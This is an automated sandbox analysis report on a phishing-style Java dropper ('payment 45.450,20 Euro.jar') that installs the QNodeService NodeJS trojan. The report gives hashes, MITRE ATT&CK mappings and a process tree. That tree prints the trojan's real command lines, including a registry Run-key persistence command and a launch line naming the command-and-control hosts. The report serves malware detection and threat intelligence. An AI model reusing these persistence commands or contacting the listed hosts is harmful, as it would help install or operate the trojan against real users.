qnodeservice | 62716017ffcc1ef7fc4923eeb3d0df2e8c5dfde0e195eb4ef2aa4673f83f20a2

General

Target

payment 45.450,20 Euro.jar
Size

12KB
MD5

070253aecc9cd3441285bd1a5710b62e
SHA1

05c90b7a18329fe99956913dfed535ebe5503bf7
SHA256

62716017ffcc1ef7fc4923eeb3d0df2e8c5dfde0e195eb4ef2aa4673f83f20a2
SHA512

40145524b698fc72d8fa4b7b10fd3a554a941bcff0a116484eda7ed290474bda6409812196f96b7b25c857c2625db10e7e5874a25b2375a7f102aa3dc7132b26

Score

10^/10

Malware Config

Signatures

Executes dropped EXE 2 IoCs

pid	Process
3400	node.exe
3744	node.exe

Suspicious behavior: EnumeratesProcesses 2 IoCs

pid	Process
3744	node.exe
3744	node.exe

Looks up external IP address via web service 2 IoCs

Uses a legitimate IP lookup service to find the infected system's external IP.

flow	ioc
12	wtfismyip.com
13	wtfismyip.com

Adds Run entry to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\Software\Microsoft\Windows\CurrentVersion\Run\qnodejs-16d81cee = "cmd /D /C \"C:\\Users\\Admin\\qnodejs-node-v13.13.0-win-x64\\qnodejs\\qnodejs-16d81cee.cmd\""	reg.exe
Key created	\REGISTRY\USER\S-1-5-21-1231583446-2617009595-2137880041-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	reg.exe

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 3888 wrote to memory of 3400	3888	java.exe	70
PID 3888 wrote to memory of 3400	3888	java.exe	70
PID 3400 wrote to memory of 68	3400	node.exe	71
PID 3400 wrote to memory of 68	3400	node.exe	71
PID 68 wrote to memory of 3048	68	cmd.exe	72
PID 68 wrote to memory of 3048	68	cmd.exe	72
PID 3400 wrote to memory of 3744	3400	node.exe	73
PID 3400 wrote to memory of 3744	3400	node.exe	73

QNodeService NodeJS Trojan 1 IoCs

resource	yara_rule
behavioral2/files/0x000100000001bf9c-118.dat	family_qnodeservice

Checks processor information in registry 2 TTPs 6 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\1\ProcessorNameString	node.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz	node.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	node.exe

QNodeService
is a trojan written in NodeJS and spread via Java downloader. Utilizes stealer functionality.
trojan qnodeservice

Loads dropped DLL 4 IoCs

pid	Process
3744	node.exe
3744	node.exe
3744	node.exe
3744	node.exe

C:\ProgramData\Oracle\Java\javapath\java.exe
java -jar "C:\Users\Admin\AppData\Local\Temp\payment 45.450,20 Euro.jar"
1⤵
- Suspicious use of WriteProcessMemory
PID:3888
- C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
  C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\wizard.js start --group user:[email protected] --register-startup --central-base-url https://eurotools.spdns.org --central-base-url https://eurotools.chickenkiller.com
  2⤵
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:3400
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /d /s /c "REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-16d81cee" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-16d81cee.cmd\"""
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:68
  - - C:\Windows\system32\reg.exe
      REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "qnodejs-16d81cee" /t REG_SZ /F /D "cmd /D /C \"C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-16d81cee.cmd\""
      4⤵
      Adds Run entry to start application
      PID:3048
- - C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe
    C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\node.exe C:\Users\Admin\qnodejs-node-v13.13.0-win-x64\qnodejs\qnodejs-win32-x64.js serve start --group user:[email protected] --register-startup --central-base-url https://eurotools.spdns.org --central-base-url https://eurotools.chickenkiller.com
    3⤵
    - Executes dropped EXE
    - Suspicious behavior: EnumeratesProcesses
    - Checks processor information in registry
    - Loads dropped DLL
    PID:3744

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/3400-117-0x000003E9F13C0000-0x000003E9F13C1000-memory.dmp

Filesize
4KB

Download
memory/3744-123-0x00000169BAEC0000-0x00000169BAEC1000-memory.dmp

Filesize
4KB

Download

Analysis

Sharing